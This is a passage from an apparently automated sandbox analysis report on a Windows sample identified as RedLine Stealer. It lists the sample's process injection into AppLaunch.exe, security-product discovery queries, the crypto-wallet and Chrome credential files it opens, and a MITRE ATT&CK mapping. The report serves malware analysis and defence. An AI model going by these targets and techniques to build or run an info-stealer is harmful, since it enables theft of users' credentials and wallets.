                      Contains functionality to inject code into remote processes
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A22181 CreateProcessW,GetThreadContext,ReadProcessMemory,VirtualAlloc,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualProtectEx,VirtualFree,WriteProcessMemory,SetThreadContext,0_2_00A22181
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5840 -s 94748Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_00A06017
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_00A0E973
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00A0EA99
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_00A0EB9F
                      Source: C:\Users\user\Desktop\file.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00A0E30D
                      Source: C:\Users\user\Desktop\file.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00A0EC6E
                      Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_00A0E5AF
                      Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_00A0E5FA
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_00A06539
                      Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_00A0E695
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00A0E720
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F9415 cpuid 0_2_009F9415
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F909E GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_009F909E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                      Stealing of Sensitive Information

                      barindex
                      Yara detected RedLine Stealer
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.file.exe.9f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.file.exe.890000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.a22780.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.298695211.0000000000A23000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.295452062.0000000000A23000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.256237407.0000000000892000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 5840, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 100032, type: MEMORYSTR
                      Tries to steal Crypto Currency Wallets
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                      Found many strings related to Crypto-Wallets (likely being stolen)
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectrumE#
                      Source: AppLaunch.exe, 00000002.00000002.363059245.0000000007752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Jl4C:\Users\user\AppData\Roaming\Electrum\wallets\*
                      Source: AppLaunch.exe, 00000002.00000002.360684678.000000000768F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: cjelfplplebdjjenllpjcblmjkfcffne|JaxxxLiberty
                      Source: AppLaunch.exe, 00000002.00000002.376899619.000000000A99C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\*.json
                      Source: AppLaunch.exe, 00000002.00000002.363059245.0000000007752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum\wallets
                      Source: AppLaunch.exe, 00000002.00000002.376899619.000000000A99C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\*.json
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: EthereumE#
                      Source: AppLaunch.exe, 00000002.00000002.363059245.0000000007752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Jl8C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: Yara matchFile source: 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.363059245.0000000007752000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 100032, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected RedLine Stealer
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.file.exe.9f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.file.exe.890000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.a22780.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.298695211.0000000000A23000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.295452062.0000000000A23000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.256237407.0000000000892000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 5840, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 100032, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts221
                      Windows Management Instrumentation                      		Path Interception411
                      Process Injection                      		1
                      Masquerading                      		1
                      OS Credential Dumping                      		1
                      System Time Discovery                      		Remote Services1
                      Input Capture                      		Exfiltration Over Other Network Medium1
                      Encrypted Channel                      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts11
                      Disable or Modify Tools                      		1
                      Input Capture                      		251
                      Security Software Discovery                      		Remote Desktop Protocol1
                      Archive Collected Data                      		Exfiltration Over Bluetooth1
                      Non-Standard Port                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)241
                      Virtualization/Sandbox Evasion                      		Security Account Manager11
                      Process Discovery                      		SMB/Windows Admin Shares3
                      Data from Local System                      		Automated Exfiltration1
                      Application Layer Protocol                      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)411
                      Process Injection                      		NTDS241
                      Virtualization/Sandbox Evasion                      		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information                      		LSA Secrets1
                      Application Window Discovery                      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common31
                      Obfuscated Files or Information                      		Cached Domain Credentials1
                      Remote System Discovery                      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                      File and Directory Discovery                      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem144
                      System Information Discovery                      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      file.exe35%VirustotalBrowse
                      file.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
                      http://tempuri.org/0%URL Reputationsafe
                      http://tempuri.org/0%URL Reputationsafe
                      http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id90%URL Reputationsafe
                      http://tempuri.org/Entity/Id80%URL Reputationsafe
                      http://tempuri.org/Entity/Id50%URL Reputationsafe
                      http://tempuri.org/Entity/Id40%URL Reputationsafe
                      http://tempuri.org/Entity/Id70%URL Reputationsafe
                      http://tempuri.org/Entity/Id60%URL Reputationsafe
                      http://tempuri.org/Entity/Id19Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id6Response0%URL Reputationsafe
                      https://api.ip.sb/ip0%URL Reputationsafe
                      http://tempuri.org/Entity/Id9Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id200%URL Reputationsafe
                      http://tempuri.org/Entity/Id210%URL Reputationsafe
                      http://tempuri.org/Entity/Id220%URL Reputationsafe
                      http://tempuri.org/Entity/Id230%URL Reputationsafe
                      http://tempuri.org/Entity/Id240%URL Reputationsafe
                      http://tempuri.org/Entity/Id24Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id1Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id100%URL Reputationsafe
                      http://tempuri.org/Entity/Id110%URL Reputationsafe
                      http://tempuri.org/Entity/Id120%URL Reputationsafe
                      http://tempuri.org/Entity/Id120%URL Reputationsafe
                      http://tempuri.org/Entity/Id16Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id16Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id130%URL Reputationsafe
                      http://tempuri.org/Entity/Id130%URL Reputationsafe
                      http://tempuri.org/Entity/Id140%URL Reputationsafe
                      http://tempuri.org/Entity/Id150%URL Reputationsafe
                      http://tempuri.org/Entity/Id160%URL Reputationsafe
                      http://tempuri.org/Entity/Id170%URL Reputationsafe
                      http://tempuri.org/Entity/Id180%URL Reputationsafe
                      http://tempuri.org/Entity/Id5Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id190%URL Reputationsafe
                      http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id8Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id23Response0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://schemas.xmlsoap.org/ws/2005/02/sc/sctAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://duckduckgo.com/chrome_newtabAppLaunch.exe, 00000002.00000002.372408978.0000000008599000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372136186.0000000008538000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.371455315.000000000843C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373051767.0000000008690000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.371778582.00000000084BA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372805407.000000000862F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373188331.00000000086AD000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.371644889.000000000849D000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.371355743.000000000841F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372688030.0000000008612000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.359286293.0000000007569000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372551259.00000000085B6000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.359831862.00000000075F5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.360602784.0000000007682000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.358674223.00000000074DD000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372032571.000000000851B000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://duckduckgo.com/ac/?q=AppLaunch.exe, 00000002.00000002.372551259.00000000085B6000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.359831862.00000000075F5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.360602784.0000000007682000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.358674223.00000000074DD000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.372032571.000000000851B000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinaryAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://tempuri.org/Entity/Id12ResponseAppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.363059245.0000000007752000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://tempuri.org/AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://tempuri.org/Entity/Id2ResponseAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://tempuri.org/Entity/Id21ResponseAppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.363059245.0000000007752000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://tempuri.org/Entity/Id9AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/ws/2004/08/addressing/faulthAppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://tempuri.org/Entity/Id8AppLaunch.exe, 00000002.00000002.360684678.000000000768F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://tempuri.org/Entity/Id5AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/PrepareAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://tempuri.org/Entity/Id4AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://tempuri.org/Entity/Id7AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://tempuri.org/Entity/Id6AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://tempuri.org/Entity/Id19ResponseAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.363059245.0000000007752000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licenseAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceAppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/faultAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://schemas.xmlsoap.org/ws/2004/10/wsatAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeyAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://tempuri.org/Entity/Id15ResponseAppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.363059245.0000000007752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://tempuri.org/Entity/Id6ResponseAppLaunch.exe, 00000002.00000002.360684678.000000000768F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://api.ip.sb/ipfile.exe, file.exe, 00000000.00000000.298695211.0000000000A23000.00000004.00000001.01000000.00000003.sdmp, AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://schemas.xmlsoap.org/ws/2004/04/scAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelAppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
